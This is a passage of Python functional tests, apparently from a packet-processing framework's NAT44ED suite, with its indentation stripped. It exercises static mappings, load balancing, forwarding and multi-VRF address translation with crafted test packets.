capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, same_port=True)
users = self.vapi.nat44_user_dump()
self.assertEqual(len(users), 1)
static_user = users[0]
self.assertEqual(static_user.nstaticsessions, 3)
self.assertEqual(static_user.nsessions, 0)
# in2out - no static mapping match (forwarding test)
host0 = self.pg0.remote_hosts[0]
self.pg0.remote_hosts[0] = self.pg0.remote_hosts[1]
try:
pkts = self.create_stream_out(self.pg1,
dst_ip=self.pg0.remote_ip4,
use_inside_ports=True)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
same_port=True)
finally:
self.pg0.remote_hosts[0] = host0
users = self.vapi.nat44_user_dump()
self.assertEqual(len(users), 2)
if str(users[0].ip_address) == self.pg0.remote_hosts[0].ip4:
non_static_user = users[1]
static_user = users[0]
else:
non_static_user = users[0]
static_user = users[1]
self.assertEqual(static_user.nstaticsessions, 3)
self.assertEqual(static_user.nsessions, 0)
self.assertEqual(non_static_user.nstaticsessions, 0)
self.assertEqual(non_static_user.nsessions, 3)
users = self.vapi.nat44_user_dump()
self.assertEqual(len(users), 2)
if str(users[0].ip_address) == self.pg0.remote_hosts[0].ip4:
non_static_user = users[1]
static_user = users[0]
else:
non_static_user = users[0]
static_user = users[1]
self.assertEqual(static_user.nstaticsessions, 3)
self.assertEqual(static_user.nsessions, 0)
self.assertEqual(non_static_user.nstaticsessions, 0)
self.assertEqual(non_static_user.nsessions, 3)
def test_frag_out_of_order_do_not_translate(self):
""" NAT44ED don't translate fragments arriving out of order """
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_forwarding_enable_disable(enable=True)
self.frag_out_of_order(proto=IP_PROTOS.tcp, dont_translate=True)
def test_forwarding(self):
""" NAT44ED forwarding test """
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat44_forwarding_enable_disable(enable=1)
real_ip = self.pg0.remote_ip4
alias_ip = self.nat_addr
flags = self.config_flags.NAT_IS_ADDR_ONLY
self.vapi.nat44_add_del_static_mapping(is_add=1,
local_ip_address=real_ip,
external_ip_address=alias_ip,
external_sw_if_index=0xFFFFFFFF,
flags=flags)
try:
# in2out - static mapping match
pkts = self.create_stream_out(self.pg1)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, same_port=True)
# in2out - no static mapping match
host0 = self.pg0.remote_hosts[0]
self.pg0.remote_hosts[0] = self.pg0.remote_hosts[1]
try:
pkts = self.create_stream_out(self.pg1,
dst_ip=self.pg0.remote_ip4,
use_inside_ports=True)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
same_port=True)
finally:
self.pg0.remote_hosts[0] = host0
user = self.pg0.remote_hosts[1]
sessions = self.vapi.nat44_user_session_dump(user.ip4, 0)
self.assertEqual(len(sessions), 3)
self.assertTrue(sessions[0].flags &
self.config_flags.NAT_IS_EXT_HOST_VALID)
self.vapi.nat44_del_session(
address=sessions[0].inside_ip_address,
port=sessions[0].inside_port,
protocol=sessions[0].protocol,
flags=(self.config_flags.NAT_IS_INSIDE |
self.config_flags.NAT_IS_EXT_HOST_VALID),
ext_host_address=sessions[0].ext_host_address,
ext_host_port=sessions[0].ext_host_port)
sessions = self.vapi.nat44_user_session_dump(user.ip4, 0)
self.assertEqual(len(sessions), 2)
finally:
self.vapi.nat44_forwarding_enable_disable(enable=0)
flags = self.config_flags.NAT_IS_ADDR_ONLY
self.vapi.nat44_add_del_static_mapping(
is_add=0,
local_ip_address=real_ip,
external_ip_address=alias_ip,
external_sw_if_index=0xFFFFFFFF,
flags=flags)
def test_output_feature_and_service2(self):
""" NAT44ED interface output feature and service host direct access """
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.nat_addr)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index, is_add=1,)
# session initiated from service host - translate
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
pkts = self.create_stream_out(self.pg1)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
# session initiated from remote host - do not translate
tcp_port_in = self.tcp_port_in
udp_port_in = self.udp_port_in
icmp_id_in = self.icmp_id_in
self.tcp_port_in = 60303
self.udp_port_in = 60304
self.icmp_id_in = 60305
try:
pkts = self.create_stream_out(self.pg1,
self.pg0.remote_ip4,
use_inside_ports=True)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, nat_ip=self.pg0.remote_ip4,
same_port=True)
finally:
self.tcp_port_in = tcp_port_in
self.udp_port_in = udp_port_in
self.icmp_id_in = icmp_id_in
def test_twice_nat(self):
""" NAT44ED Twice NAT """
self.twice_nat_common()
def test_self_twice_nat_positive(self):
""" NAT44ED Self Twice NAT (positive test) """
self.twice_nat_common(self_twice_nat=True, same_pg=True)
def test_self_twice_nat_lb_positive(self):
""" NAT44ED Self Twice NAT local service load balancing (positive test)
"""
self.twice_nat_common(lb=True, self_twice_nat=True, same_pg=True,
client_id=1)
def test_twice_nat_lb(self):
""" NAT44ED Twice NAT local service load balancing """
self.twice_nat_common(lb=True)
def test_output_feature(self):
""" NAT44ED interface output feature (in2out postrouting) """
self.vapi.nat44_forwarding_enable_disable(enable=1)
self.nat_add_address(self.nat_addr)
self.nat_add_outside_interface(self.pg0)
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index, is_add=1)
# in2out
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
self.logger.debug(self.vapi.cli("show trace"))
# out2in
pkts = self.create_stream_out(self.pg1)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
self.logger.debug(self.vapi.cli("show trace"))
# in2out
pkts = self.create_stream_in(self.pg0, self.pg1, ttl=2)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
self.logger.debug(self.vapi.cli("show trace"))
# out2in
pkts = self.create_stream_out(self.pg1, ttl=2)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
self.verify_capture_in(capture, self.pg0)
self.logger.debug(self.vapi.cli("show trace"))
# in2out
pkts = self.create_stream_in(self.pg0, self.pg1, ttl=1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
self.assertIn(ICMP, p)
self.assertEqual(p[ICMP].type, 11) # 11 == time-exceeded
def test_static_with_port_out2(self):
""" NAT44ED 1:1 NAPT asymmetrical rule """
external_port = 80
local_port = 8080
self.vapi.nat44_forwarding_enable_disable(enable=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
local_port, external_port,
proto=IP_PROTOS.tcp, flags=flags)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# from client to service
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg0.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# ICMP error
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
ICMP(type=11) / capture[0][IP])
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
self.assertEqual(p[IP].src, self.nat_addr)
inner = p[IPerror]
self.assertEqual(inner.dst, self.nat_addr)
self.assertEqual(inner[TCPerror].dport, external_port)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# ICMP error
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
ICMP(type=11) / capture[0][IP])
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
self.assertEqual(p[IP].dst, self.pg0.remote_ip4)
inner = p[IPerror]
self.assertEqual(inner.src, self.pg0.remote_ip4)
self.assertEqual(inner[TCPerror].sport, local_port)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from client to server (no translation)
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
TCP(sport=12346, dport=local_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg0.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client (no translation)
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12346))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg0.remote_ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_static_lb(self):
""" NAT44ED local service load balancing """
external_addr_n = self.nat_addr
external_port = 80
local_port = 8080
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
locals = [{'addr': server1.ip4,
'port': local_port,
'probability': 70,
'vrf_id': 0},
{'addr': server2.ip4,
'port': local_port,
'probability': 30,
'vrf_id': 0}]
self.nat_add_address(self.nat_addr)
self.vapi.nat44_add_del_lb_static_mapping(
is_add=1,
external_addr=external_addr_n,
external_port=external_port,
protocol=IP_PROTOS.tcp,
local_num=len(locals),
locals=locals)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
# from client to service
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
server = None
try:
ip = p[IP]
tcp = p[TCP]
self.assertIn(ip.dst, [server1.ip4, server2.ip4])
if ip.dst == server1.ip4:
server = server1
else:
server = server2
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client
p = (Ether(src=server.mac, dst=self.pg0.local_mac) /
IP(src=server.ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
self.assertEqual(len(sessions), 1)
self.assertTrue(sessions[0].flags &
self.config_flags.NAT_IS_EXT_HOST_VALID)
self.vapi.nat44_del_session(
address=sessions[0].inside_ip_address,
port=sessions[0].inside_port,
protocol=sessions[0].protocol,
flags=(self.config_flags.NAT_IS_INSIDE |
self.config_flags.NAT_IS_EXT_HOST_VALID),
ext_host_address=sessions[0].ext_host_address,
ext_host_port=sessions[0].ext_host_port)
sessions = self.vapi.nat44_user_session_dump(server.ip4, 0)
self.assertEqual(len(sessions), 0)
def test_static_lb_2(self):
""" NAT44ED local service load balancing (asymmetrical rule) """
external_addr = self.nat_addr
external_port = 80
local_port = 8080
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
locals = [{'addr': server1.ip4,
'port': local_port,
'probability': 70,
'vrf_id': 0},
{'addr': server2.ip4,
'port': local_port,
'probability': 30,
'vrf_id': 0}]
self.vapi.nat44_forwarding_enable_disable(enable=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.vapi.nat44_add_del_lb_static_mapping(is_add=1, flags=flags,
external_addr=external_addr,
external_port=external_port,
protocol=IP_PROTOS.tcp,
local_num=len(locals),
locals=locals)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
# from client to service
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=12345, dport=external_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
server = None
try:
ip = p[IP]
tcp = p[TCP]
self.assertIn(ip.dst, [server1.ip4, server2.ip4])
if ip.dst == server1.ip4:
server = server1
else:
server = server2
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client
p = (Ether(src=server.mac, dst=self.pg0.local_mac) /
IP(src=server.ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.nat_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from client to server (no translation)
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=server1.ip4) /
TCP(sport=12346, dport=local_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
server = None
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, server1.ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service back to client (no translation)
p = (Ether(src=server1.mac, dst=self.pg0.local_mac) /
IP(src=server1.ip4, dst=self.pg1.remote_ip4) /
TCP(sport=local_port, dport=12346))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, server1.ip4)
self.assertEqual(tcp.sport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_lb_affinity(self):
""" NAT44ED local service load balancing affinity """
external_addr = self.nat_addr
external_port = 80
local_port = 8080
server1 = self.pg0.remote_hosts[0]
server2 = self.pg0.remote_hosts[1]
locals = [{'addr': server1.ip4,
'port': local_port,
'probability': 50,
'vrf_id': 0},
{'addr': server2.ip4,
'port': local_port,
'probability': 50,
'vrf_id': 0}]
self.nat_add_address(self.nat_addr)
self.vapi.nat44_add_del_lb_static_mapping(is_add=1,
external_addr=external_addr,
external_port=external_port,
protocol=IP_PROTOS.tcp,
affinity=10800,
local_num=len(locals),
locals=locals)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
flags=flags, is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=1025, dport=external_port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
backend = capture[0][IP].dst
sessions = self.vapi.nat44_user_session_dump(backend, 0)
self.assertEqual(len(sessions), 1)
self.assertTrue(sessions[0].flags &
self.config_flags.NAT_IS_EXT_HOST_VALID)
self.vapi.nat44_del_session(
address=sessions[0].inside_ip_address,
port=sessions[0].inside_port,
protocol=sessions[0].protocol,
flags=(self.config_flags.NAT_IS_INSIDE |
self.config_flags.NAT_IS_EXT_HOST_VALID),
ext_host_address=sessions[0].ext_host_address,
ext_host_port=sessions[0].ext_host_port)
pkts = []
for port in range(1030, 1100):
p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=port, dport=external_port))
pkts.append(p)
self.pg1.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(len(pkts))
for p in capture:
self.assertEqual(p[IP].dst, backend)
def test_multiple_vrf_1(self):
""" Multiple VRF - both client & service in VRF1 """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
port = 0
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1, flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg6.sw_if_index,
is_add=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
local_port, external_port, vrf_id=1,
proto=IP_PROTOS.tcp, flags=flags)
p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
IP(src=self.pg6.remote_ip4, dst=external_addr) /
TCP(sport=12345, dport=external_port))
self.pg6.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg5.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg5.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
IP(src=self.pg5.remote_ip4, dst=self.pg6.remote_ip4) /
TCP(sport=local_port, dport=12345))
self.pg5.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, external_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_multiple_vrf_2(self):
""" Multiple VRF - dynamic NAT from VRF1 to VRF0 (output-feature) """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
port = 0
self.nat_add_address(self.nat_addr)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_output_feature(
sw_if_index=self.pg1.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1, flags=flags)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
local_port, external_port, vrf_id=1,
proto=IP_PROTOS.tcp, flags=flags)
p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
IP(src=self.pg5.remote_ip4, dst=self.pg1.remote_ip4) /
TCP(sport=2345, dport=22))
self.pg5.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.nat_addr)
self.assert_packet_checksums_valid(p)
port = tcp.sport
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
TCP(sport=22, dport=port))
self.pg1.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg5.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg5.remote_ip4)
self.assertEqual(tcp.dport, 2345)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_multiple_vrf_3(self):
""" Multiple VRF - client in VRF1, service in VRF0 """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
port = 0
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1, flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg6.sw_if_index,
is_add=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(
self.pg0.remote_ip4,
external_sw_if_index=self.pg0.sw_if_index,
local_port=local_port,
vrf_id=0,
external_port=external_port,
proto=IP_PROTOS.tcp,
flags=flags
)
# from client VRF1 to service VRF0
p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
IP(src=self.pg6.remote_ip4, dst=self.pg0.local_ip4) /
TCP(sport=12346, dport=external_port))
self.pg6.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg0.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service VRF0 back to client VRF1
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
TCP(sport=local_port, dport=12346))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, self.pg0.local_ip4)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_multiple_vrf_4(self):
""" Multiple VRF - client in VRF0, service in VRF1 """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
port = 0
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1, flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1, flags=flags)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
local_port, external_port, vrf_id=1,
proto=IP_PROTOS.tcp, flags=flags)
# from client VRF0 to service VRF1
p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
IP(src=self.pg0.remote_ip4, dst=external_addr) /
TCP(sport=12347, dport=external_port))
self.pg0.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg5.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg5.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from service VRF1 back to client VRF0
p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
IP(src=self.pg5.remote_ip4, dst=self.pg0.remote_ip4) /
TCP(sport=local_port, dport=12347))
self.pg5.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg0.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.src, external_addr)
self.assertEqual(tcp.sport, external_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
def test_multiple_vrf_5(self):
""" Multiple VRF - forwarding - no translation """
external_addr = '1.2.3.4'
external_port = 80
local_port = 8080
port = 0
self.vapi.nat44_forwarding_enable_disable(enable=1)
flags = self.config_flags.NAT_IS_INSIDE
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg0.sw_if_index,
is_add=1, flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg5.sw_if_index,
is_add=1, flags=flags)
self.vapi.nat44_interface_add_del_feature(
sw_if_index=self.pg6.sw_if_index,
is_add=1)
flags = self.config_flags.NAT_IS_OUT2IN_ONLY
self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
local_port, external_port, vrf_id=1,
proto=IP_PROTOS.tcp, flags=flags)
self.nat_add_static_mapping(
self.pg0.remote_ip4,
external_sw_if_index=self.pg0.sw_if_index,
local_port=local_port,
vrf_id=0,
external_port=external_port,
proto=IP_PROTOS.tcp,
flags=flags
)
# from client to server (both VRF1, no translation)
p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
IP(src=self.pg6.remote_ip4, dst=self.pg5.remote_ip4) /
TCP(sport=12348, dport=local_port))
self.pg6.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg5.get_capture(1)
p = capture[0]
try:
ip = p[IP]
tcp = p[TCP]
self.assertEqual(ip.dst, self.pg5.remote_ip4)
self.assertEqual(tcp.dport, local_port)
self.assert_packet_checksums_valid(p)
except:
self.logger.error(ppp("Unexpected or invalid packet:", p))
raise
# from server back to client (both VRF1, no translation)
p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
IP(src=self.pg5.remote_ip4, dst=self.pg6.remote_ip4) /
TCP(sport=local_port, dport=12348))
self.pg5.add_stream(p)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg6.get_capture(1)
